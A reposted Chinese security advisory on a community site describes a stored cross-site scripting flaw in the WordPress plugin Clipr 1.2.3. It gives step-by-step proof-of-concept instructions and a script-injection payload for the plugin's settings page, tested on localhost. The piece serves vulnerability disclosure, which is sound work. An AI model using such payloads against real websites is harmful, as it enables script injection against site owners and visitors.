开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

社区首页 >专栏 >WordPress Clipr 1.2.3 跨站脚本

WordPress Clipr 1.2.3 跨站脚本

作者头像

Khan安全团队

发布于 2022-04-21 11:49:07

4530

发布于 2022-04-21 11:49:07

举报

文章被收录于专栏：Khan安全团队

# 供应商主页：https://wordpress.org/plugins/clipr/

<https://wordpress.org/plugins/amministrazione-aperta/>

# 版本：1.2.3

# 测试：火狐

#POC

- 安装插件 https://wordpress.org/plugins/clipr/
- 导航到插件的设置页面：
http://localhost:10003/wp-admin/options-general.php?page=clip
- 注入paylaod `asdasd'></script><script>alert(1)</script>`
- 导航到 WordPress URL 的主页
`http://localhost:10003/` <http://localhost:10003/>
- 恶意 Javascript 有效负载将执行。

本文系转载，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文系转载，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

评论

登录后参与评论

0 条评论

热度

最新

LV.

相关产品与服务

网站建设

网站建设（Website Design Service，WDS），是帮助您快速搭建企业网站的服务。通过自助模板建站工具及专业设计服务，无需了解代码技术，即可自由拖拽模块，可视化完成网站管理。全功能管理后台操作方便，一次更新，数据多端同步，省时省心。使用网站建设服务，您无需维持技术和设计师团队，即可快速实现网站上线，达到企业数字化转型的目的。

产品介绍产品文档

精选特惠用云无忧